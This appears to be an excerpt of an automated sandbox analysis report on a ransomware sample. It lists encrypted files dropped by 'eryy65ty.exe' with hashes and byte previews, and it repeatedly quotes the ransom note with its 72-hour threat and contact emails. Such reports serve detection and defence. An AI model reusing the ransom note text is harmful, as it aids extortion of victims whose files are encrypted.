                                                                                                                                            SHA-512:6A8BB67D7A4DB0C3B93FC96FE0CB4B10133CD2AF778C3CE899E4CC34F1E833C5CF497A3B7470A10C8CE2C774F67F61DD3441117CFD1147F4B710A00612AFE542
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..1.I...d._[.....f..`[E.b.1D$.O....i...'N[..l.v..D.....Gr...H...L....ml..z..|.|.6..j.:7.....&J...4..H...u...J...xzp..*+.....O.((r.p%.....Wn..Ha....@.3h..)^..S...........Y..U.l..VD_..A.|...2.......i..:..^.....N....L...3.l....b..3..[@.$.Z(h.[..Y.q.}Z.....@.....!.X.*...J...\.'L.^..x.>.W.........?...F..fs..sZ7l..K.kFB.k,.D........m'........C..`.._Lm........{.;..$.^.x.d.R[......O.............l.....WY).\n\0......IRP2.Q... |o.~..e.. .......k.....L2!........ :.B.....s.......0}R...P.Q..E.X......ok.Vwy...Z................D..Z..y...D.pg%.e".c..w.|q........!...[.x4...fl|W".>.q.7.s...+..{5.I...q.&..E.%8H...<...3.w.f.:Hww.B......3]..1.....t..;..2.-.k.....8....S..Q.~..h.....~CX....MOfF.......\9...j..R......jO......m..X.P .XlC....n..... ..6-.O..w.n.C..*8.....,....fJ\....U....h.c\A...'..7+....Yg+R..p.(..v..)'W....K....(.o....2.~..T.~$.K8.dsJ6uX..vP.....h.%.../.....R..].u..!Dk%.^m.Q.?.J..... .K.Y[T..$...97.....|z...c-..a.c.#.B.......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4599
                                                                                                                                            Entropy (8bit):7.951704833262196
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:+N43M1J+eNqXlVvidrLLMaK8qzCc+ZUuREE4uOQt:+N43ssVXPCr0X8qf+Z9pt
                                                                                                                                            MD5:10F55CE3A36367352BBBE71FC1EDCB1A
                                                                                                                                            SHA1:A93C6BC94293BC9072E21DBBA87BBA7B1647B001
                                                                                                                                            SHA-256:8C103E3276CF75DC829B910A3766CC900F8EB0341DA5EB5A18AA67FC15820B51
                                                                                                                                            SHA-512:0DE70543175EB21531BA9208A75E5B736532D54215884251397B506420277647C1AD721D2C2666CCAA408EC449655C9E1952FF224BFA9076FC3CB31DA7EDD447
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.(..C"...YY...+G.p...\D.2.L...'........(...7........P........Hl].7....A......."l/.I.gGRc...=.Y3...z.;...{*.........(..k;.....~[.c.........~.i......BDDH...(......9.77]..&>b.J0...e.....1.N..Y.)x.......;.$.....\0...o.4......B....|.Yx{f..X.b...O=8.a.m..*K.....f_..HB.,.......;:Q.I.?%.K.l.}&..u..>.r.7'.^ >f9.0.@...q..6=.:.m.a..:.F."[K ..&vtZ?...v.-.........C.d!.!.a'.......o].Y.......&...p....?&y;.o..|.~...W*....MrB}..6j....3c7....F....f...5K\......l.E..D&.9.,..R...$.=..~.HI[6#.......v\...=C.$.x......s.b.a..j.v.R..{......[+H......H....Y..Z'Y..O....5.......@.q.8C*3...{.3..,'..l[....J%'&.K...g..{(.9.J.Oq.......5h...Q...,.HD..T{.C....R.,....n...'...*.Ks:..(.{.hpn[..I....!6.;.....h.U...GJi.SrbP..j..qh..2R?U.#.....-.X.TIg/c.mHf...3...@.......y5,...i.......nc.e.d*..e.)T<.0..=..R?.i....;.`...`..-.\.j1m..m..FT.m.i..JSh..lk....7J......W...z..>...J.......m.h[D...w.k...q....5.Q....&.....w..k....qj#.n..6...S..R...H.k.p..aMFnA.j-..^...9E..e.../.V.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4599
                                                                                                                                            Entropy (8bit):7.951704833262196
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:+N43M1J+eNqXlVvidrLLMaK8qzCc+ZUuREE4uOQt:+N43ssVXPCr0X8qf+Z9pt
                                                                                                                                            MD5:10F55CE3A36367352BBBE71FC1EDCB1A
                                                                                                                                            SHA1:A93C6BC94293BC9072E21DBBA87BBA7B1647B001
                                                                                                                                            SHA-256:8C103E3276CF75DC829B910A3766CC900F8EB0341DA5EB5A18AA67FC15820B51
                                                                                                                                            SHA-512:0DE70543175EB21531BA9208A75E5B736532D54215884251397B506420277647C1AD721D2C2666CCAA408EC449655C9E1952FF224BFA9076FC3CB31DA7EDD447
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.(..C"...YY...+G.p...\D.2.L...'........(...7........P........Hl].7....A......."l/.I.gGRc...=.Y3...z.;...{*.........(..k;.....~[.c.........~.i......BDDH...(......9.77]..&>b.J0...e.....1.N..Y.)x.......;.$.....\0...o.4......B....|.Yx{f..X.b...O=8.a.m..*K.....f_..HB.,.......;:Q.I.?%.K.l.}&..u..>.r.7'.^ >f9.0.@...q..6=.:.m.a..:.F."[K ..&vtZ?...v.-.........C.d!.!.a'.......o].Y.......&...p....?&y;.o..|.~...W*....MrB}..6j....3c7....F....f...5K\......l.E..D&.9.,..R...$.=..~.HI[6#.......v\...=C.$.x......s.b.a..j.v.R..{......[+H......H....Y..Z'Y..O....5.......@.q.8C*3...{.3..,'..l[....J%'&.K...g..{(.9.J.Oq.......5h...Q...,.HD..T{.C....R.,....n...'...*.Ks:..(.{.hpn[..I....!6.;.....h.U...GJi.SrbP..j..qh..2R?U.#.....-.X.TIg/c.mHf...3...@.......y5,...i.......nc.e.d*..e.)T<.0..=..R?.i....;.`...`..-.\.j1m..m..FT.m.i..JSh..lk....7J......W...z..>...J.......m.h[D...w.k...q....5.Q....&.....w..k....qj#.n..6...S..R...H.k.p..aMFnA.j-..^...9E..e.../.V.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1483
                                                                                                                                            Entropy (8bit):7.876227967223248
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:omtJvCYs3FgDJkIvmpdxc02j43JT4DOuPSIQxolEJ6bQ8zY91IeVkza6wKcJwJ:bvCJ1Tdxc0RZ8DlfOougQ8MlgFwHuJ
                                                                                                                                            MD5:B68C080076656AEC69B47017D796C658
                                                                                                                                            SHA1:8B4CCB2AD8751AD360631AF9B8C48538B6086C9F
                                                                                                                                            SHA-256:DDC533D426B9E220558F04A9EB1972A4DA9BA164037A0892525BB3163FA5D41A
                                                                                                                                            SHA-512:C6CF7AA45B9AEDC7E4CADE3D4CED9DF27D555987C2560B2F16439A2621DA9C1142E8BA8273D468E068AFE84B90E1D0397C86192FCCEF6892F23387681EA32B83
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:/.Q...1...N...Q7.Jo.+.;.y....d.q5.b.O.....X.v..}.P.p..>.......=....7.%..l.#..F.o.1`.{.z..U.A.!Q..~.N..XryK.P.E.H.f.y.GO..,.1.'..?.!.'.=.oZ$..n.foE.Y....."..r...1.......v..6?.%J..nJ0.^..W.-.;.y.@.#r.}..a....2O...o+....A_Xo$....L...r..}.X.....V.E.).~6-.....j.@.t?kM..4p.......c.Z.=..e1.S..~]......M...H..Jx.....Y.....@....?\.}.Y(.I.....S......M.m.7U".?..(.dv....x...U...9BE.]......T.....}............:u.U.(.I..2b..t)u...]...W.<.Z...x>.....:.C..(J.K.t.....e{..N...0...p[...b.r..6..6..+...........5.:{...h..T!.........0.m.zy..N. ...uD.iMJ.(x.h....K.f.{%+g......v...\.<..1`.`..'.kW..><..ZQ{.`.=..X5F../.B<..A../$.{aQ.3..*1B.I..=Oj_.7.iW.)xd.|0.#.hl.c..e.... .ApC.(yBn..&..~.ak%....C=H.a........-<'1.&...S.=.v".e. ....).....6_..p c3B.Jb'..TWH.N.O..hA.w.`.m...i..2..4[.2I..%{.hm..AO.....J.G....8........G\..2q....E`...........GL8Bh.AJRB...e ...:\Z....^Z}c.....n.=.Y.V........e.......r.}.....;6..4.J..7P.F........Py>1*.d..ZN.F^.@z..5|3...Y.....'..N".e"5.$... ..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1483
                                                                                                                                            Entropy (8bit):7.876227967223248
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:omtJvCYs3FgDJkIvmpdxc02j43JT4DOuPSIQxolEJ6bQ8zY91IeVkza6wKcJwJ:bvCJ1Tdxc0RZ8DlfOougQ8MlgFwHuJ
                                                                                                                                            MD5:B68C080076656AEC69B47017D796C658
                                                                                                                                            SHA1:8B4CCB2AD8751AD360631AF9B8C48538B6086C9F
                                                                                                                                            SHA-256:DDC533D426B9E220558F04A9EB1972A4DA9BA164037A0892525BB3163FA5D41A
                                                                                                                                            SHA-512:C6CF7AA45B9AEDC7E4CADE3D4CED9DF27D555987C2560B2F16439A2621DA9C1142E8BA8273D468E068AFE84B90E1D0397C86192FCCEF6892F23387681EA32B83
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:/.Q...1...N...Q7.Jo.+.;.y....d.q5.b.O.....X.v..}.P.p..>.......=....7.%..l.#..F.o.1`.{.z..U.A.!Q..~.N..XryK.P.E.H.f.y.GO..,.1.'..?.!.'.=.oZ$..n.foE.Y....."..r...1.......v..6?.%J..nJ0.^..W.-.;.y.@.#r.}..a....2O...o+....A_Xo$....L...r..}.X.....V.E.).~6-.....j.@.t?kM..4p.......c.Z.=..e1.S..~]......M...H..Jx.....Y.....@....?\.}.Y(.I.....S......M.m.7U".?..(.dv....x...U...9BE.]......T.....}............:u.U.(.I..2b..t)u...]...W.<.Z...x>.....:.C..(J.K.t.....e{..N...0...p[...b.r..6..6..+...........5.:{...h..T!.........0.m.zy..N. ...uD.iMJ.(x.h....K.f.{%+g......v...\.<..1`.`..'.kW..><..ZQ{.`.=..X5F../.B<..A../$.{aQ.3..*1B.I..=Oj_.7.iW.)xd.|0.#.hl.c..e.... .ApC.(yBn..&..~.ak%....C=H.a........-<'1.&...S.=.v".e. ....).....6_..p c3B.Jb'..TWH.N.O..hA.w.`.m...i..2..4[.2I..%{.hm..AO.....J.G....8........G\..2q....E`...........GL8Bh.AJRB...e ...:\Z....^Z}c.....n.=.Y.V........e.......r.}.....;6..4.J..7P.F........Py>1*.d..ZN.F^.@z..5|3...Y.....'..N".e"5.$... ..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):284
                                                                                                                                            Entropy (8bit):7.130604702353614
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:Cm6KX2u4XB1s6b/p82jMA6k4v1A6OrLYIshlMktyYvVo++jr0C5uQMn:oKX2uA1hHxL4OlrLLEhC++v5VMn
                                                                                                                                            MD5:0DE503F2028D44969483477870FC590F
                                                                                                                                            SHA1:B812C6C2B31D3B913824A199466688440A9903B8
                                                                                                                                            SHA-256:CE989D2DD336E329981ECFB62CF4831B82E2078ABCEF36EED68A0B8153CBEA58
                                                                                                                                            SHA-512:C0AD3D9AB11455447CC2A4CBA703FA70F0F7EEF4ECBD007498EA495FC36B0C9661F3D86EE160467463CDFC9D1C38999E17F4B84EB0222CBFE9428F8A9A015DBB
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:VW..b........m.}}.....|.4...Q..6."*Dz..},.....u..=~:.T.`....3A0..9..}JI......k0S...{a...L@........S.o...!wl.!4.\...Ks...o..1.\H.o....Q\)6j:.P.8..N..!.:...v.x..6N..,...d..e....a.Uo..~.I....\OP{D..L8...l...e.WKJAH....J0L..C....0..3.Q,]@......(.}...V.....{.z..Q .....0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):284
                                                                                                                                            Entropy (8bit):7.130604702353614
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:Cm6KX2u4XB1s6b/p82jMA6k4v1A6OrLYIshlMktyYvVo++jr0C5uQMn:oKX2uA1hHxL4OlrLLEhC++v5VMn
                                                                                                                                            MD5:0DE503F2028D44969483477870FC590F
                                                                                                                                            SHA1:B812C6C2B31D3B913824A199466688440A9903B8
                                                                                                                                            SHA-256:CE989D2DD336E329981ECFB62CF4831B82E2078ABCEF36EED68A0B8153CBEA58
                                                                                                                                            SHA-512:C0AD3D9AB11455447CC2A4CBA703FA70F0F7EEF4ECBD007498EA495FC36B0C9661F3D86EE160467463CDFC9D1C38999E17F4B84EB0222CBFE9428F8A9A015DBB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:VW..b........m.}}.....|.4...Q..6."*Dz..},.....u..=~:.T.`....3A0..9..}JI......k0S...{a...L@........S.o...!wl.!4.\...Ks...o..1.\H.o....Q\)6j:.P.8..N..!.:...v.x..6N..,...d..e....a.Uo..~.I....\OP{D..L8...l...e.WKJAH....J0L..C....0..3.Q,]@......(.}...V.....{.z..Q .....0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4362
                                                                                                                                            Entropy (8bit):7.956907864694045
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:PP8zlcU1q90iX1oucJ18WD+ieDHs8fZ7ehE5Uk6TQXngaA:Uc9nCN53eH5eh5Rygz
                                                                                                                                            MD5:B8E9C0CE59E23A1F55E1FEFD20CA0739
                                                                                                                                            SHA1:2EA5117F790CD51CA8CA2082651312AFC3325EE4
                                                                                                                                            SHA-256:8D006CE8F2CCFFFE05BA22901DB531B8620E39BDAF71311F63E79590C1D02210
                                                                                                                                            SHA-512:3BF35745155C863EA363CAF09518B50E30478F5DE81767098E5C9DBA2ADF03FD5FE36CFE514581BD84E8A2FA7382A8567E424E62AA00C4B0418103996D07D7B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:...m.-..<x.m..mQ..O..{.mi..".._....?.c...,e.qfB../>..}..dw....0..o.)C.....Jq%.%.......h2...[...u.9..A...%.0.K.sN.+..a.Z..o.VE.oh.N.J.ny".&.N...Z..,..4;.<ec.'Y..._i5#..,..).}z...#.."....t..Y..'.%...|..+.Od.R.......-5....v..h..?'......."....|i{.I.Z.(...3....'....3.......C...z.]....x...p.......L....MMyi.'>&J..9&.OB.....d.....3P>.i..........#..G.pZ..0...\.......... .L.sY$........U...p....... .{bS....6.Z+y].qh.B..wT.n-...h......-1Kc.*.A.s....>EL...[v.h.....y.&.?..Q.\.:.=..T.,........=MQ.C/...3'.m...C...\SU..L...'-..8..A./k...uB.E..e............J..df.4..8]..q.`...B...>5..xH.....g.A......Q.Y.w...f.D....;.Y.&.G-....Q......U~...=..].,5m......+.*.....&M........ak.....f.........xs.d...?...X.-9."c:.l.,.|-1 ....+.=..~....Q.Il.f...d8/.3vO...l...2.q.-.d.Y.i?......sR..m.....;io.L...K..{w.b.../.........Z.{.^.-..a/..8...o...K....9...y9...(M...}MK....%.'`"..s..ggTRH..R.f<.Kj)]$....tx..d..`.8.G.>.).....>".Ft..|..K.:.....A..m.....q.d..u{....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4362
                                                                                                                                            Entropy (8bit):7.956907864694045
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:PP8zlcU1q90iX1oucJ18WD+ieDHs8fZ7ehE5Uk6TQXngaA:Uc9nCN53eH5eh5Rygz
                                                                                                                                            MD5:B8E9C0CE59E23A1F55E1FEFD20CA0739
                                                                                                                                            SHA1:2EA5117F790CD51CA8CA2082651312AFC3325EE4
                                                                                                                                            SHA-256:8D006CE8F2CCFFFE05BA22901DB531B8620E39BDAF71311F63E79590C1D02210
                                                                                                                                            SHA-512:3BF35745155C863EA363CAF09518B50E30478F5DE81767098E5C9DBA2ADF03FD5FE36CFE514581BD84E8A2FA7382A8567E424E62AA00C4B0418103996D07D7B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...m.-..<x.m..mQ..O..{.mi..".._....?.c...,e.qfB../>..}..dw....0..o.)C.....Jq%.%.......h2...[...u.9..A...%.0.K.sN.+..a.Z..o.VE.oh.N.J.ny".&.N...Z..,..4;.<ec.'Y..._i5#..,..).}z...#.."....t..Y..'.%...|..+.Od.R.......-5....v..h..?'......."....|i{.I.Z.(...3....'....3.......C...z.]....x...p.......L....MMyi.'>&J..9&.OB.....d.....3P>.i..........#..G.pZ..0...\.......... .L.sY$........U...p....... .{bS....6.Z+y].qh.B..wT.n-...h......-1Kc.*.A.s....>EL...[v.h.....y.&.?..Q.\.:.=..T.,........=MQ.C/...3'.m...C...\SU..L...'-..8..A./k...uB.E..e............J..df.4..8]..q.`...B...>5..xH.....g.A......Q.Y.w...f.D....;.Y.&.G-....Q......U~...=..].,5m......+.*.....&M........ak.....f.........xs.d...?...X.-9."c:.l.,.|-1 ....+.=..~....Q.Il.f...d8/.3vO...l...2.q.-.d.Y.i?......sR..m.....;io.L...K..{w.b.../.........Z.{.^.-..a/..8...o...K....9...y9...(M...}MK....%.'`"..s..ggTRH..R.f<.Kj)]$....tx..d..`.8.G.>.).....>".Ft..|..K.:.....A..m.....q.d..u{....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):131338
                                                                                                                                            Entropy (8bit):0.508049495008258
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:tjzzBoNT2JWDjqz1JdLfO8ZOCOdr7avrqOwSP53i7MeArqu5S1Gs1V8snnj:tjZ6TEW/qBJBfO8cCDTqOR53ikrBM1Xj
                                                                                                                                            MD5:DCF99C2861F3EC7BFA049B3C7381A0BA
                                                                                                                                            SHA1:D6136E482BA5097DCD5C3CE9CB4A6986FC05050B
                                                                                                                                            SHA-256:E1D37C570FEC6E03111FEDA997DBDFE91DBB1C26D07334B1BABD4F30023D060C
                                                                                                                                            SHA-512:5A4C5166F8E04363268BE17C04BFC0F3A419013678FD6DED3C2DF74495AE58940429E97EC05CE33B753ECFB41C5FA22F67680DE233055709DC874230BA2E4143
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:%?./.E.;.K{!.s .}j\5.^...._.........9.?x....|...k....0mh.S.*K7$YET..&b.F..@.....x.#J.}...D#XS.>"[F...G..KI.9.7.&E...(..x#!.C~.6.*.%N,l|.dA..A......k........N4b;....L.L...5Z...5..++;.m..G.......m.N.o.5.A..L...K/h..t\a.h..)...&.....;..|.(...9!>wT.rD#;x._.H>iV.@v..>.....#......m..[5...7....0.v9..TrCx.....B34.........E.\...R..=2............-.-_..=..'....=.<.z.W....Q.D..G....lo.uC....V.../.i..u...........y.H.A._c..g..j........A......~.l....$o...t..y.....`.4.Rz5.....<..'....5..+.i.S.Q.'..J......u. ...|I@..O..&"......bm.9.N'..X0I..).B.CX.~.O....:.o...C.S..../...!.1+.....O.R..z ..=.....f............T..1...1.8#....._...f.Ho\...v{..!.g9.}..X..P....'R.......4.Z..e.i([.yq....~.4._T..."'!ts..*.p...Lg..};.h....NY.....EaH3P..m.......=.h.>.......^"RZ!a.......\..[.....0|..}.k.."......M...Z..Pq..6..K.....=......+.Iz.ds..B.eMe:..HF.#X.K.?...Rp.:.%.l.a2...h....[.[........w...<..Z.5.l.c...J$...nK.sc;-xS..Q..I8l>...8A.\un........|..a..b.g..Yu?Z16.Nbo...}.^E
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):131338
                                                                                                                                            Entropy (8bit):0.508049495008258
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:tjzzBoNT2JWDjqz1JdLfO8ZOCOdr7avrqOwSP53i7MeArqu5S1Gs1V8snnj:tjZ6TEW/qBJBfO8cCDTqOR53ikrBM1Xj
                                                                                                                                            MD5:DCF99C2861F3EC7BFA049B3C7381A0BA
                                                                                                                                            SHA1:D6136E482BA5097DCD5C3CE9CB4A6986FC05050B
                                                                                                                                            SHA-256:E1D37C570FEC6E03111FEDA997DBDFE91DBB1C26D07334B1BABD4F30023D060C
                                                                                                                                            SHA-512:5A4C5166F8E04363268BE17C04BFC0F3A419013678FD6DED3C2DF74495AE58940429E97EC05CE33B753ECFB41C5FA22F67680DE233055709DC874230BA2E4143
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:%?./.E.;.K{!.s .}j\5.^...._.........9.?x....|...k....0mh.S.*K7$YET..&b.F..@.....x.#J.}...D#XS.>"[F...G..KI.9.7.&E...(..x#!.C~.6.*.%N,l|.dA..A......k........N4b;....L.L...5Z...5..++;.m..G.......m.N.o.5.A..L...K/h..t\a.h..)...&.....;..|.(...9!>wT.rD#;x._.H>iV.@v..>.....#......m..[5...7....0.v9..TrCx.....B34.........E.\...R..=2............-.-_..=..'....=.<.z.W....Q.D..G....lo.uC....V.../.i..u...........y.H.A._c..g..j........A......~.l....$o...t..y.....`.4.Rz5.....<..'....5..+.i.S.Q.'..J......u. ...|I@..O..&"......bm.9.N'..X0I..).B.CX.~.O....:.o...C.S..../...!.1+.....O.R..z ..=.....f............T..1...1.8#....._...f.Ho\...v{..!.g9.}..X..P....'R.......4.Z..e.i([.yq....~.4._T..."'!ts..*.p...Lg..};.h....NY.....EaH3P..m.......=.h.>.......^"RZ!a.......\..[.....0|..}.k.."......M...Z..Pq..6..K.....=......+.Iz.ds..B.eMe:..HF.#X.K.?...Rp.:.%.l.a2...h....[.[........w...<..Z.5.l.c...J$...nK.sc;-xS..Q..I8l>...8A.\un........|..a..b.g..Yu?Z16.Nbo...}.^E
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):302
                                                                                                                                            Entropy (8bit):7.359721254060979
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:9uXyeQFVsTJ9dabyHpOJfFQJcqGQhcLDBDEEe/JhMPSdUl46GYIOySmn:UCNyd5HCFicqGQbEefql46GzXn
                                                                                                                                            MD5:22700B9B57AE8E03CFB1D1C8AE103C63
                                                                                                                                            SHA1:83E588F26D92B1972005ACF563664CDC05313611
                                                                                                                                            SHA-256:1098D826AB69FF9B18911275ADFA7E3F6716C87C3A9273F751B551B8D911C189
                                                                                                                                            SHA-512:5ABD61ECADCBC8B4EDEBB1ECA626E8B1897E7C4C29234571B878772EDCF1DBB577B7AD01A0F76D65657E0420EC646744C6B1E7661EE66A1333474DE4CA895E70
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:L.@.{....'gI .q..;-..4)Mh..juW.ome.rP...v.,....}.....v.Y=^..`......>:.c[..=D.3a|..,....%W0...8.XN.D.S..,.}.......57........^.!....0.5........:.].'...l.db............-.<H.5v):.8HR.w|k..H.G.g.*...Q.w.is^..a!\.........0Zu.....N. ......lRzSg..._N.k.{.....<..X......DR.N.....S...0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):302
                                                                                                                                            Entropy (8bit):7.359721254060979
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:9uXyeQFVsTJ9dabyHpOJfFQJcqGQhcLDBDEEe/JhMPSdUl46GYIOySmn:UCNyd5HCFicqGQbEefql46GzXn
                                                                                                                                            MD5:22700B9B57AE8E03CFB1D1C8AE103C63
                                                                                                                                            SHA1:83E588F26D92B1972005ACF563664CDC05313611
                                                                                                                                            SHA-256:1098D826AB69FF9B18911275ADFA7E3F6716C87C3A9273F751B551B8D911C189
